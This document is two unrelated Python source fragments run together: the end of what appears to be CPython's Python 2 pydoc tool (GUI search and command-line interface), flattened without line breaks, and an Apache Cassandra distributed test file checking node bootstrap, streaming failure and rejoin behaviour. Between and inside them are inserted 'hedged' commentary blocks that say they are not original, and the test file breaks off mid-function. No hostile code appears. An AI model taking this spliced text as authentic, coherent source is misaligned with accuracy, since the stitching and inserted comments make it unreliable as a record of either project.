% key) self.search_ent.forget() self.search_lbl.pack(side='left') self.result_lst.delete(0, 'end') self.goto_btn.config(state='disabled') self.expand() import threading if self.scanner: self.scanner.quit = 1 self.scanner = ModuleScanner() threading.Thread(target=self.scanner.run, args=(self.update, key, self.done)).start() def update(self, path, modname, desc): if modname[-9:] == '.__init__': modname = modname[:-9] + ' (package)' self.result_lst.insert('end', modname + ' - ' + (desc or '(no description)')) def stop(self, event=None): if self.scanner: self.scanner.quit = 1 self.scanner = None def done(self): self.scanner = None self.search_lbl.config(text='Search for') self.search_lbl.pack(side='left') self.search_ent.pack(side='right', fill='x', expand=1) if sys.platform != 'win32': self.stop_btn.forget() self.stop_btn.config(state='disabled') def select(self, event=None): self.goto_btn.config(state='normal') def goto(self, event=None): selection = self.result_lst.curselection() if selection: modname = split(self.result_lst.get(selection[0]))[0] self.open(url=self.server.url + modname + '.html') def collapse(self): if not self.expanded: return self.result_frm.forget() self.result_scr.forget() self.result_lst.forget() self.bigwidth = self.window.winfo_width() self.bigheight = self.window.winfo_height() self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight)) self.window.wm_minsize(self.minwidth, self.minheight) self.expanded = 0 def expand(self): if self.expanded: return self.result_frm.pack(side='bottom', fill='x') self.result_scr.pack(side='right', fill='y') self.result_lst.pack(side='top', fill='both', expand=1) self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight)) self.window.wm_minsize(self.minwidth, self.bigminheight) self.expanded = 1 def hide(self, event=None): self.stop() self.collapse() import Tkinter try: root = Tkinter.Tk() # Tk will crash if pythonw.exe has an XP .manifest # file and the root has is not destroyed explicitly. # If the problem is ever fixed in Tk, the explicit # destroy can go. try: gui = GUI(root) root.mainloop() finally: root.destroy() except KeyboardInterrupt: pass # -------------------------------------------------- command-line interface def ispath(x): return isinstance(x, str) and find(x, os.sep) >= 0 def cli(): """Command-line interface (looks at sys.argv to decide what to do).""" import getopt class BadUsage: pass # Scripts don't get the current directory in their path by default # unless they are run with the '-m' switch if '' not in sys.path: scriptdir = os.path.dirname(sys.argv[0]) if scriptdir in sys.path: sys.path.remove(scriptdir) sys.path.insert(0, '.') try: opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w') writing = 0 for opt, val in opts: if opt == '-g': gui() return if opt == '-k': apropos(val) return if opt == '-p': try: port = int(val) except ValueError: raise BadUsage def ready(server): print 'pydoc server ready at %s' % server.url def stopped(): print 'pydoc server stopped' serve(port, ready, stopped) return if opt == '-w': writing = 1 if not args: raise BadUsage for arg in args: if ispath(arg) and not os.path.exists(arg): print 'file %r does not exist' % arg break try: if ispath(arg) and os.path.isfile(arg): arg = importfile(arg) if writing: if ispath(arg) and os.path.isdir(arg): writedocs(arg) else: writedoc(arg) else: help.help(arg) except ErrorDuringImport, value: print value except (getopt.error, BadUsage): cmd = os.path.basename(sys.argv[0]) print """pydoc - the Python documentation tool %s <name> ... 
Show text documentation on something. <name> may be the name of a Python keyword, topic, function, module, or package, or a dotted reference to a class or function within a module or module in a package. If <name> contains a '%s', it is used as the path to a Python source file to document. If name is 'keywords', 'topics', or 'modules', a listing of these things is displayed. %s -k <keyword> Search for a keyword in the synopsis lines of all available modules. %s -p <port> Start an HTTP server on the given port on the local machine. %s -g Pop up a graphical interface for finding and serving documentation. %s -w <name> ... Write out the HTML documentation for a module to a file in the current directory. If <name> contains a '%s', it is treated as a filename; if it names a directory, documentation is written for all the contents. """ % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep) if __name__ == '__main__': cli()
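# Hedged usage sketch (not part of CPython's pydoc): a minimal, uncalled example
# of driving the documenters defined above from Python code. The module names
# 'os.path' and 'json' and the keyword 'thread' are arbitrary placeholders.
def _example_usage():
    """Illustrative only; pydoc itself never calls this."""
    # render_doc() resolves a dotted name via locate()/resolve() and formats the
    # result with the module-level TextDoc instance `text`.
    print render_doc('os.path')
    # writedoc() formats with the HTMLDoc instance `html` and writes
    # '<name>.html' into the current working directory.
    writedoc('json')
    # apropos() prints one summary line per module whose synopsis matches.
    apropos('thread')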
bootstrap_test.py
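# Hedged overview (not part of the original test module): the tests below share a
# common shape -- populate a small ccm cluster, write data with node.stress(),
# add a node with tools.misc.new_node(), start it (usually with
# wait_for_binary_proto=True), and finally check the recorded bootstrap state
# with assert_bootstrap_state(self, node, 'COMPLETED').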
import os import random import re import shutil import tempfile import threading import time import logging import signal from cassandra import ConsistencyLevel from cassandra.concurrent import execute_concurrent_with_args from ccmlib.node import NodeError, TimeoutError, ToolError, Node import pytest from distutils.version import LooseVersion from dtest import Tester, create_ks, create_cf, data_size from tools.assertions import (assert_almost_equal, assert_bootstrap_state, assert_not_running, assert_one, assert_stderr_clean) from tools.data import query_c1c2 from tools.intervention import InterruptBootstrap, KillOnBootstrap, KillOnReadyToBootstrap from tools.misc import new_node, generate_ssl_stores since = pytest.mark.since logger = logging.getLogger(__name__) class TestBootstrap(Tester): byteman_submit_path_pre_4_0 = './byteman/pre4.0/stream_failure.btm' byteman_submit_path_4_0 = './byteman/4.0/stream_failure.btm' @pytest.fixture(autouse=True) def fixture_add_additional_log_patterns(self, fixture_dtest_setup): fixture_dtest_setup.allow_log_errors = True fixture_dtest_setup.ignore_log_patterns = ( # This one occurs when trying to send the migration to a # node that hasn't started yet, and when it does, it gets # replayed and everything is fine. r'Can\'t send migration request: node.*is down', # ignore streaming error during bootstrap r'Exception encountered during startup', r'Streaming error occurred' ) def _base_bootstrap_test(self, bootstrap=None, bootstrap_from_version=None, enable_ssl=None): def default_bootstrap(cluster, token): node2 = new_node(cluster) node2.set_configuration_options(values={'initial_token': token}) node2.start(wait_for_binary_proto=True) return node2 if bootstrap is None: bootstrap = default_bootstrap cluster = self.cluster if enable_ssl: logger.debug("***using internode ssl***") generate_ssl_stores(self.fixture_dtest_setup.test_path) cluster.enable_internode_ssl(self.fixture_dtest_setup.test_path) tokens = cluster.balanced_tokens(2) cluster.set_configuration_options(values={'num_tokens': 1}) logger.debug("[node1, node2] tokens: %r" % (tokens,)) keys = 10000 # Create a single node cluster cluster.populate(1) node1 = cluster.nodelist()[0] if bootstrap_from_version: logger.debug("starting source node on version {}".format(bootstrap_from_version)) node1.set_install_dir(version=bootstrap_from_version) node1.set_configuration_options(values={'initial_token': tokens[0]}) cluster.start() session = self.patient_cql_connection(node1) create_ks(session, 'ks', 1) create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'}) # record the size before inserting any of our own data empty_size = data_size(node1, 'ks','cf') logger.debug("node1 empty size for ks.cf: %s" % float(empty_size)) insert_statement = session.prepare("INSERT INTO ks.cf (key, c1, c2) VALUES (?, 'value1', 'value2')") execute_concurrent_with_args(session, insert_statement, [['k%d' % k] for k in range(keys)]) node1.flush() node1.compact() initial_size = data_size(node1,'ks','cf') logger.debug("node1 size for ks.cf before bootstrapping node2: %s" % float(initial_size)) # Reads inserted data all during the bootstrap process. 
We shouldn't # get any error query_c1c2(session, random.randint(0, keys - 1), ConsistencyLevel.ONE) session.shutdown() # Bootstrapping a new node in the current version node2 = bootstrap(cluster, tokens[1]) node2.compact() node1.cleanup() logger.debug("node1 size for ks.cf after cleanup: %s" % float(data_size(node1,'ks','cf'))) node1.compact() logger.debug("node1 size for ks.cf after compacting: %s" % float(data_size(node1,'ks','cf'))) logger.debug("node2 size for ks.cf after compacting: %s" % float(data_size(node2,'ks','cf'))) size1 = float(data_size(node1,'ks','cf')) size2 = float(data_size(node2,'ks','cf')) assert_almost_equal(size1, size2, error=0.3) assert_almost_equal(float(initial_size - empty_size), 2 * (size1 - float(empty_size))) assert_bootstrap_state(self, node2, 'COMPLETED') @pytest.mark.no_vnodes def test_simple_bootstrap_with_ssl(self): self._base_bootstrap_test(enable_ssl=True) @pytest.mark.no_vnodes def test_simple_bootstrap(self): self._base_bootstrap_test() @pytest.mark.no_vnodes def test_bootstrap_on_write_survey(self): def bootstrap_on_write_survey_and_join(cluster, token): node2 = new_node(cluster) node2.set_configuration_options(values={'initial_token': token}) node2.start(jvm_args=["-Dcassandra.write_survey=true"], wait_for_binary_proto=True) assert len(node2.grep_log('Startup complete, but write survey mode is active, not becoming an active ring member.')) assert_bootstrap_state(self, node2, 'IN_PROGRESS') node2.nodetool("join") assert len(node2.grep_log('Leaving write survey mode and joining ring at operator request')) return node2 self._base_bootstrap_test(bootstrap_on_write_survey_and_join) def _test_bootstrap_with_compatibility_flag_on(self, bootstrap_from_version): def bootstrap_with_compatibility_flag_on(cluster, token): node2 = new_node(cluster) node2.set_configuration_options(values={'initial_token': token}) # cassandra.force_3_0_protocol_version parameter is needed to allow schema # changes during the bootstrapping for upgrades from 3.0.14+ to anything upwards for 3.0.x or 3.x clusters. 
# @jira_ticket CASSANDRA-13004 for detailed context on `cassandra.force_3_0_protocol_version` flag node2.start(jvm_args=["-Dcassandra.force_3_0_protocol_version=true"], wait_for_binary_proto=True) return node2 self._base_bootstrap_test(bootstrap_with_compatibility_flag_on, bootstrap_from_version=bootstrap_from_version) @since('3.10') @pytest.mark.no_vnodes def test_simple_bootstrap_small_keepalive_period(self): """ @jira_ticket CASSANDRA-11841 Test that bootstrap completes if it takes longer than streaming_socket_timeout_in_ms or 2*streaming_keep_alive_period_in_secs to receive a single sstable """ cluster = self.cluster yaml_opts = {'streaming_keep_alive_period_in_secs': 2} if cluster.version() < '4.0': yaml_opts['streaming_socket_timeout_in_ms'] = 1000 cluster.set_configuration_options(values=yaml_opts) # Create a single node cluster cluster.populate(1) node1 = cluster.nodelist()[0] logger.debug("Setting up byteman on {}".format(node1.name)) # set up byteman node1.byteman_port = '8100' node1.import_config_files() cluster.start() # Create more than one sstable larger than 1MB node1.stress(['write', 'n=1K', '-rate', 'threads=8', '-schema', 'compaction(strategy=SizeTieredCompactionStrategy, enabled=false)']) cluster.flush() logger.debug("Submitting byteman script to {} to".format(node1.name)) # Sleep longer than streaming_socket_timeout_in_ms to make sure the node will not be killed node1.byteman_submit(['./byteman/stream_5s_sleep.btm']) # Bootstraping a new node with very small streaming_socket_timeout_in_ms node2 = new_node(cluster) node2.start(wait_for_binary_proto=True) # Shouldn't fail due to streaming socket timeout timeout assert_bootstrap_state(self, node2, 'COMPLETED') for node in cluster.nodelist(): assert node.grep_log('Scheduling keep-alive task with 2s period.', filename='debug.log') assert node.grep_log('Sending keep-alive', filename='debug.log') assert node.grep_log('Received keep-alive', filename='debug.log') def test_simple_bootstrap_nodata(self): """ @jira_ticket CASSANDRA-11010 Test that bootstrap completes if streaming from nodes with no data """ cluster = self.cluster # Create a two-node cluster cluster.populate(2) cluster.start() # Bootstrapping a new node node3 = new_node(cluster) node3.start(wait_for_binary_proto=True) assert_bootstrap_state(self, node3, 'COMPLETED') def test_read_from_bootstrapped_node(self): """ Test bootstrapped node sees existing data @jira_ticket CASSANDRA-6648 """ cluster = self.cluster cluster.populate(3) cluster.start() node1 = cluster.nodes['node1'] node1.stress(['write', 'n=10K', 'no-warmup', '-rate', 'threads=8', '-schema', 'replication(factor=2)']) session = self.patient_cql_connection(node1) stress_table = 'keyspace1.standard1' original_rows = list(session.execute("SELECT * FROM %s" % (stress_table,))) node4 = new_node(cluster) node4.start(wait_for_binary_proto=True) session = self.patient_exclusive_cql_connection(node4) new_rows = list(session.execute("SELECT * FROM %s" % (stress_table,))) assert original_rows == new_rows @since('3.0') def test_bootstrap_waits_for_streaming_to_finish(self): """ Test that bootstrap completes and is marked as such after streaming finishes. 
""" cluster = self.cluster logger.debug("Create a cluster") cluster.populate(1) node1 = cluster.nodelist()[0] logger.debug("Start node 1") node1.start(wait_for_binary_proto=True) logger.debug("Insert 10k rows") node1.stress(['write', 'n=10K', 'no-warmup', '-rate', 'threads=8', '-schema', 'replication(factor=2)']) logger.debug("Bootstrap node 2 with delay") node2 = new_node(cluster, byteman_port='4200') node2.update_startup_byteman_script('./byteman/bootstrap_5s_sleep.btm') node2.start(wait_for_binary_proto=True) assert_bootstrap_state(self, node2, 'COMPLETED') assert node2.grep_log('Bootstrap completed', filename='debug.log') def test_consistent_range_movement_true_with_replica_down_should_fail(self): self._bootstrap_test_with_replica_down(True) def test_consistent_range_movement_false_with_replica_down_should_succeed(self): self._bootstrap_test_with_replica_down(False) def test_consistent_range_movement_true_with_rf1_should_fail(self): self._bootstrap_test_with_replica_down(True, rf=1) def test_consistent_range_movement_false_with_rf1_should_succeed(self): self._bootstrap_test_with_replica_down(False, rf=1) def _bootstrap_test_with_replica_down(self, consistent_range_movement, rf=2): """ Test to check consistent bootstrap will not succeed when there are insufficient replicas @jira_ticket CASSANDRA-11848 """ cluster = self.cluster cluster.populate(2) node1, node2 = cluster.nodelist() node3_token = None # Make token assignment deterministic if not self.dtest_config.use_vnodes: cluster.set_configuration_options(values={'num_tokens': 1}) tokens = cluster.balanced_tokens(3) logger.debug("non-vnode tokens: %r" % (tokens,)) node1.set_configuration_options(values={'initial_token': tokens[0]}) node2.set_configuration_options(values={'initial_token': tokens[2]}) node3_token = tokens[1] # Add node 3 between node1 and node2 cluster.start() node1.stress(['write', 'n=10K', 'no-warmup', '-rate', 'threads=8', '-schema', 'replication(factor={})'.format(rf)]) # change system_auth keyspace to 2 (default is 1) to avoid # "Unable to find sufficient sources for streaming" warning if cluster.cassandra_version() >= '2.2.0': session = self.patient_cql_connection(node1) session.execute(""" ALTER KEYSPACE system_auth WITH replication = {'class':'SimpleStrategy', 'replication_factor':2}; """) # Stop node2, so node3 will not be able to perform consistent range movement node2.stop(wait_other_notice=True) successful_bootstrap_expected = not consistent_range_movement node3 = new_node(cluster, token=node3_token) node3.start(wait_for_binary_proto=successful_bootstrap_expected, wait_other_notice=successful_bootstrap_expected, jvm_args=["-Dcassandra.consistent.rangemovement={}".format(consistent_range_movement)]) if successful_bootstrap_expected: # with rf=1 and cassandra.consistent.rangemovement=false, missing sources are ignored if not consistent_range_movement and rf == 1: node3.watch_log_for("Unable to find sufficient sources for streaming range") assert node3.is_running() assert_bootstrap_state(self, node3, 'COMPLETED') else: if consistent_range_movement: if cluster.version() < '4.0': node3.watch_log_for("A node required to move the data consistently is down") else: node3.watch_log_for("Necessary replicas for strict consistency were removed by source filters") else: node3.watch_log_for("Unable to find sufficient sources for streaming range") assert_not_running(node3) @since('2.2') def test_resumable_bootstrap(self): """ Test resuming bootstrap after data streaming failure """ cluster = self.cluster cluster.populate(2) 
node1 = cluster.nodes['node1'] # set up byteman node1.byteman_port = '8100' node1.import_config_files() cluster.start() # kill stream to node3 in the middle of streaming to let it fail if cluster.version() < '4.0': node1.byteman_submit([self.byteman_submit_path_pre_4_0]) else: node1.byteman_submit([self.byteman_submit_path_4_0]) node1.stress(['write', 'n=1K', 'no-warmup', 'cl=TWO', '-schema', 'replication(factor=2)', '-rate', 'threads=50']) cluster.flush() # start bootstrapping node3 and wait for streaming node3 = new_node(cluster) node3.start(wait_other_notice=False) # let streaming fail as we expect node3.watch_log_for('Some data streaming failed') # bring back node3 and invoke nodetool bootstrap to resume bootstrapping node3.nodetool('bootstrap resume') node3.wait_for_binary_interface() assert_bootstrap_state(self, node3, 'COMPLETED') # cleanup to guarantee each node will only have sstables of its ranges cluster.cleanup() logger.debug("Check data is present") # Let's check stream bootstrap completely transferred data stdout, stderr, _ = node3.stress(['read', 'n=1k', 'no-warmup', '-schema', 'replication(factor=2)', '-rate', 'threads=8']) if stdout is not None: assert "FAILURE" not in stdout @since('2.2') def test_bootstrap_with_reset_bootstrap_state(self): """Test bootstrap with resetting bootstrap progress""" cluster = self.cluster cluster.set_configuration_options(values={'stream_throughput_outbound_megabits_per_sec': 1}) cluster.populate(2).start() node1 = cluster.nodes['node1'] node1.stress(['write', 'n=100K', '-schema', 'replication(factor=2)']) node1.flush() # kill node1 in the middle of streaming to let it fail t = InterruptBootstrap(node1) t.start() # start bootstrapping node3 and wait for streaming node3 = new_node(cluster) try: node3.start() except NodeError: pass # node doesn't start as expected t.join() node1.start() # restart node3 bootstrap with resetting bootstrap progress node3.stop(signal_event=signal.SIGKILL) mark = node3.mark_log() node3.start(jvm_args=["-Dcassandra.reset_bootstrap_progress=true"]) # check if we reset bootstrap state node3.watch_log_for("Resetting bootstrap progress to start fresh", from_mark=mark) # wait for node3 ready to query node3.wait_for_binary_interface(from_mark=mark) # check if 2nd bootstrap succeeded assert_bootstrap_state(self, node3, 'COMPLETED') def test_manual_bootstrap(self): """ Test adding a new node and bootstrapping it manually. No auto_bootstrap. This test also verify that all data are OK after the addition of the new node. @jira_ticket CASSANDRA-9022 """ cluster = self.cluster cluster.populate(2).start() (node1, node2) = cluster.nodelist() node1.stress(['write', 'n=1K', 'no-warmup', '-schema', 'replication(factor=2)', '-rate', 'threads=1', '-pop', 'dist=UNIFORM(1..1000)']) session = self.patient_exclusive_cql_connection(node2) stress_table = 'keyspace1.standard1' original_rows = list(session.execute("SELECT * FROM %s" % stress_table)) # Add a new node node3 = new_node(cluster, bootstrap=False) node3.start(wait_for_binary_proto=True) node3.repair() node1.cleanup() current_rows = list(session.execute("SELECT * FROM %s" % stress_table)) assert original_rows == current_rows def test_local_quorum_bootstrap(self): """ Test that CL local_quorum works while a node is bootstrapping. 
@jira_ticket CASSANDRA-8058 """ cluster = self.cluster cluster.populate([1, 1]) cluster.start() node1 = cluster.nodes['node1'] yaml_config = """ # Create the keyspace and table keyspace: keyspace1 keyspace_definition: | CREATE KEYSPACE keyspace1 WITH replication = {'class': 'NetworkTopologyStrategy', 'dc1': 1, 'dc2': 1}; table: users table_definition: CREATE TABLE users ( username text, first_name text, last_name text, email text, PRIMARY KEY(username) ) WITH compaction = {'class':'SizeTieredCompactionStrategy'}; insert: partitions: fixed(1) batchtype: UNLOGGED queries: read: cql: select * from users where username = ? fields: samerow """ with tempfile.NamedTemporaryFile(mode='w+') as stress_config: stress_config.write(yaml_config) stress_config.flush() node1.stress(['user', 'profile=' + stress_config.name, 'n=200K', 'no-warmup', 'ops(insert=1)', '-rate', 'threads=10']) node3 = new_node(cluster, data_center='dc2') node3.start(jvm_args=["-Dcassandra.write_survey=true"], no_wait=True) node3_seen = False for _ in range(30): # give node3 up to 30 seconds to start ntout = node1.nodetool('status').stdout if re.search(r'UJ\s+' + node3.ip_addr, ntout): node3_seen = True break time.sleep(1) assert node3_seen, "expected {} in status:\n{}".format(node3.ip_addr, ntout) out, err, _ = node1.stress(['user', 'profile=' + stress_config.name, 'ops(insert=1)', 'n=10k', 'no-warmup', 'cl=LOCAL_QUORUM', '-rate', 'threads=10', '-errors', 'retries=2']) ntout = node1.nodetool('status').stdout assert re.search(r'UJ\s+' + node3.ip_addr, ntout), ntout logger.debug(out) assert_stderr_clean(err) regex = re.compile("Operation.+error inserting key.+Exception") failure = regex.search(str(out)) assert failure is None, "Error during stress while bootstrapping" def test_shutdown_wiped_node_cannot_join(self): self._wiped_node_cannot_join_test(gently=True) def test_killed_wiped_node_cannot_join(self): self._wiped_node_cannot_join_test(gently=False) def _wiped_node_cannot_join_test(self, gently): """ @jira_ticket CASSANDRA-9765 Test that if we stop a node and wipe its data then the node cannot join when it is not a seed. Test both a nice shutdown or a forced shutdown, via the gently parameter. """ cluster = self.cluster cluster.populate(3) cluster.start() stress_table = 'keyspace1.standard1' # write some data node1 = cluster.nodelist()[0] node1.stress(['write', 'n=10K', 'no-warmup', '-rate', 'threads=8']) session = self.patient_cql_connection(node1) original_rows = list(session.execute("SELECT * FROM {}".format(stress_table,))) # Add a new node, bootstrap=True ensures that it is not a seed node4 = new_node(cluster, bootstrap=True) node4.start(wait_for_binary_proto=True) session = self.patient_cql_connection(node4) assert original_rows == list(session.execute("SELECT * FROM {}".format(stress_table,))) # Stop the new node and wipe its data node4.stop(gently=gently) self._cleanup(node4) # Now start it, it should not be allowed to join. mark = node4.mark_log() node4.start(no_wait=True, wait_other_notice=False) node4.watch_log_for("A node with address {} already exists, cancelling join".format(node4.address_for_current_version_slashy()), from_mark=mark) def test_decommissioned_wiped_node_can_join(self): """ @jira_ticket CASSANDRA-9765 Test that if we decommission a node and then wipe its data, it can join the cluster. 
""" cluster = self.cluster cluster.populate(3) cluster.start() stress_table = 'keyspace1.standard1' # write some data node1 = cluster.nodelist()[0] node1.stress(['write', 'n=10K', 'no-warmup', '-rate', 'threads=8']) session = self.patient_cql_connection(node1) original_rows = list(session.execute("SELECT * FROM {}".format(stress_table,))) # Add a new node, bootstrap=True ensures that it is not a seed node4 = new_node(cluster, bootstrap=True) node4.start(wait_for_binary_proto=True) session = self.patient_cql_connection(node4) assert original_rows == list(session.execute("SELECT * FROM {}".format(stress_table,))) # Decommission the new node and wipe its data node4.decommission() node4.stop() self._cleanup(node4) # Now start it, it should be allowed to join mark = node4.mark_log() node4.start() node4.watch_log_for("JOINING:", from_mark=mark) def test_decommissioned_wiped_node_can_gossip_to_single_seed(self): """ @jira_ticket CASSANDRA-8072 @jira_ticket CASSANDRA-8422 Test that if we decommission a node, kill it and wipe its data, it can join a cluster with a single seed node. """ cluster = self.cluster cluster.populate(1) cluster.start() node1 = cluster.nodelist()[0] # Add a new node, bootstrap=True ensures that it is not a seed node2 = new_node(cluster, bootstrap=True) node2.start(wait_for_binary_proto=True) session = self.patient_cql_connection(node1) if cluster.version() >= '2.2': # reduce system_distributed RF to 2 so we don't require forceful decommission session.execute("ALTER KEYSPACE system_distributed WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor':'1'};") session.execute("ALTER KEYSPACE system_traces WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor':'1'};") # Decommision the new node and kill it logger.debug("Decommissioning & stopping node2") node2.decommission() node2.stop(wait_other_notice=False) # Wipe its data for data_dir in node2.data_directories(): logger.debug("Deleting {}".format(data_dir)) shutil.rmtree(data_dir) commitlog_dir = os.path.join(node2.get_path(), 'commitlogs') logger.debug("Deleting {}".format(commitlog_dir)) shutil.rmtree(commitlog_dir) # Now start it, it should be allowed to join mark = node2.mark_log() logger.debug("Restarting wiped node2") node2.start(wait_other_notice=False) node2.watch_log_for("JOINING:", from_mark=mark) def test_failed_bootstrap_wiped_node_can_join(self): """ @jira_ticket CASSANDRA-9765 Test that if a node fails to bootstrap, it can join the cluster even if the data is wiped. 
""" cluster = self.cluster cluster.populate(1) cluster.set_configuration_options(values={'stream_throughput_outbound_megabits_per_sec': 1}) cluster.start() stress_table = 'keyspace1.standard1' # write some data, enough for the bootstrap to fail later on node1 = cluster.nodelist()[0] node1.stress(['write', 'n=100K', 'no-warmup', '-rate', 'threads=8']) node1.flush() session = self.patient_cql_connection(node1) original_rows = list(session.execute("SELECT * FROM {}".format(stress_table,))) # Add a new node, bootstrap=True ensures that it is not a seed node2 = new_node(cluster, bootstrap=True) # kill node2 in the middle of bootstrap t = KillOnBootstrap(node2) t.start() node2.start() t.join() assert not node2.is_running() # wipe any data for node2 self._cleanup(node2) # Now start it again, it should be allowed to join mark = node2.mark_log() node2.start() node2.watch_log_for("JOINING:", from_mark=mark) @since('3.0') def test_node_cannot_join_as_hibernating_node_without_replace_address(self): """ @jira_ticket CASSANDRA-14559 Test that a node cannot bootstrap without replace_address if a hibernating node exists with that address """ cluster = self.cluster cluster.populate(2) # Setting seed node to first node to make sure replaced node is not in own seed list cluster.set_configuration_options({ 'seed_provider': [{'class_name': 'org.apache.cassandra.locator.SimpleSeedProvider', 'parameters': [{'seeds': '127.0.0.1'}] }] }) cluster.start() node1 = cluster.nodelist()[0] node2 = cluster.nodelist()[1] replacement_address = node2.address() node2.stop() jvm_option = 'replace_address' logger.debug("Starting replacement node {} with jvm_option '{}={}'".format(replacement_address, jvm_option, replacement_address)) replacement_node = Node('replacement', cluster=self.cluster, auto_bootstrap=True, thrift_interface=None, storage_interface=(replacement_address, 7000), jmx_port='7400', remote_debug_port='0', initial_token=None, binary_interface=(replacement_address, 9042)) cluster.add(replacement_node, False) extra_jvm_args = [] extra_jvm_args.extend(["-Dcassandra.{}={}".format(jvm_option, replacement_address), "-Dcassandra.ring_delay_ms=10000", "-Dcassandra.broadcast_interval_ms=10000"]) wait_other_notice = False wait_for_binary_proto = False # Killing node earlier in bootstrap to prevent node making it to 'normal' status. t = KillOnReadyToBootstrap(replacement_node) t.start() replacement_node.start(jvm_args=extra_jvm_args, wait_for_binary_proto=wait_for_binary_proto, wait_other_notice=wait_other_notice) t.join() logger.debug("Asserting that original replacement node is not running") assert not replacement_node.is_running() # Assert node is actually in hibernate for test to be accurate. 
logger.debug("Asserting that node is actually in hibernate status for test accuracy") assert 'hibernate' in node1.nodetool("gossipinfo").stdout extra_jvm_args = [] extra_jvm_args.extend(["-Dcassandra.ring_delay_ms=10000", "-Dcassandra.broadcast_interval_ms=10000"]) logger.debug("Starting blind replacement node {}".format(replacement_address)) blind_replacement_node = Node('blind_replacement', cluster=self.cluster, auto_bootstrap=True, thrift_interface=None, storage_interface=(replacement_address, 7000), jmx_port='7400', remote_debug_port='0', initial_token=None, binary_interface=(replacement_address, 9042)) cluster.add(blind_replacement_node, False) wait_other_notice = False wait_for_binary_proto = False blind_replacement_node.start(wait_for_binary_proto=wait_for_binary_proto, wait_other_notice=wait_other_notice) # Asserting that the new node has correct log entry self.assert_log_had_msg(blind_replacement_node, "A node with the same IP in hibernate status was detected", timeout=60) # Waiting two seconds to give node a chance to stop in case above assertion is True. # When this happens cassandra may not shut down fast enough and the below assertion fails. time.sleep(15) # Asserting that then new node is not running. # This tests the actual expected state as opposed to just checking for the existance of the above error message. assert not blind_replacement_node.is_running() @since('2.1.1') def test_simultaneous_bootstrap(self): """ Attempt to bootstrap two nodes at once, to assert the second bootstrapped node fails, and does not interfere. Start a one node cluster and run a stress write workload. Start up a second node, and wait for the first node to detect it has joined the cluster. While the second node is bootstrapping, start a third node. This should fail. @jira_ticket CASSANDRA-7069 @jira_ticket CASSANDRA-9484 """ bootstrap_error = "Other bootstrapping/leaving/moving nodes detected," \ " cannot bootstrap while cassandra.consistent.rangemovement is true" cluster = self.cluster cluster.populate(1) cluster.start() node1, = cluster.nodelist() node1.stress(['write', 'n=500K', 'no-warmup', '-schema', 'replication(factor=1)', '-rate', 'threads=10']) node2 = new_node(cluster) node2.start() for _ in range(30): # wait until node2 shows up ntout = node1.nodetool('status').stdout if re.search(r'UJ\s+' + node2.ip_addr, ntout): break time.sleep(0.1) node3 = new_node(cluster, remote_debug_port='2003') try: node3.start(wait_other_notice=False, verbose=False) except NodeError: pass # node doesn't start as expected time.sleep(.5) node2.watch_log_for("Starting listening for CQL clients") node3.watch_log_for(bootstrap_error) session = self.patient_exclusive_cql_connection(node2) # Repeat the select count(*) query, to help catch # bugs like 9484, where count(*) fails at higher # data loads. 
        for _ in range(5):
            assert_one(session, "SELECT count(*) from keyspace1.standard1", [500000], cl=ConsistencyLevel.ONE)

    def test_cleanup(self):
        """
        @jira_ticket CASSANDRA-11179
        Make sure we remove processed files during cleanup
        """
        cluster = self.cluster
        cluster.set_configuration_options(values={'concurrent_compactors': 4})
        cluster.populate(1)
        cluster.start()
        node1, = cluster.nodelist()
        for x in range(0, 5):
            node1.stress(['write', 'n=100k', 'no-warmup', '-schema', 'compaction(strategy=SizeTieredCompactionStrategy,enabled=false)', 'replication(factor=1)', '-rate', 'threads=10'])
            node1.flush()

        node2 = new_node(cluster)
        node2.start(wait_for_binary_proto=True)

        event = threading.Event()
        failed = threading.Event()
        jobs = 1
        thread = threading.Thread(target=self._monitor_datadir,
                                  args=(node1, event, len(node1.get_sstables("keyspace1", "standard1")), jobs, failed))
        thread.setDaemon(True)
        thread.start()

        node1.nodetool("cleanup -j {} keyspace1 standard1".format(jobs))
        event.set()
        thread.join()
        assert not failed.is_set()

    def _monitor_datadir(self, node, event, basecount, jobs, failed):
        while True:
            # refresh the sstable listing before checking whether cleanup left too many behind
            sstables = [s for s in node.get_sstables("keyspace1", "standard1") if "tmplink" not in s]
            if len(sstables) > basecount + jobs:
                logger.error("---")
                for sstable in sstables:
                    logger.error(sstable)
                logger.error("Current count is {}, basecount was {}".format(len(sstables), basecount))
                failed.set()
                return
            if event.is_set():
                return
            time.sleep(.1)

    def _cleanup(self, node):
        commitlog_dir = os.path.join(node.get_path(), 'commitlogs')
        for data_dir in node.data_directories():
            logger.debug("Deleting {}".format(data_dir))
            shutil.rmtree(data_dir)
        shutil.rmtree(commitlog_dir)

    @since('2.2')
    @pytest.mark.ported_to_in_jvm  # see org.apache.cassandra.distributed.test.BootstrapBinaryDisabledTest
    def test_bootstrap_binary_disabled(self):
        """
        Test the binary protocol while bootstrapping and when streaming fails.

        This test was ported to jvm-dtest org.apache.cassandra.distributed.test.BootstrapBinaryDisabledTest;
        as of this writing there are a few limitations with jvm-dtest which require this test to stay,
        namely vnode support (CI also tests under different configs). Once jvm-dtest supports vnodes,
        this test can go away in favor of that class.
@jira_ticket CASSANDRA-14526, CASSANDRA-14525, CASSANDRA-16127 """ config = {'authenticator': 'org.apache.cassandra.auth.PasswordAuthenticator', 'authorizer': 'org.apache.cassandra.auth.CassandraAuthorizer', 'role_manager': 'org.apache.cassandra.auth.CassandraRoleManager', 'permissions_validity_in_ms': 0, 'roles_validity_in_ms': 0} cluster = self.cluster cluster.populate(1) node1 = cluster.nodes['node1'] # set up byteman node1.byteman_port = '8100' node1.import_config_files() cluster.start() # kill stream to node2 in the middle of streaming to let it fail if cluster.version() < '4.0': node1.byteman_submit([self.byteman_submit_path_pre_4_0]) else: node1.byteman_submit([self.byteman_submit_path_4_0]) node1.stress(['write', 'n=1K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50', '-mode', 'native', 'cql3', 'user=cassandra', 'password=cassandra']) cluster.flush() # start bootstrapping node2 and wait for streaming node2 = new_node(cluster) node2.set_configuration_options(values=config) node2.byteman_port = '8101' # set for when we add node3 node2.import_config_files() 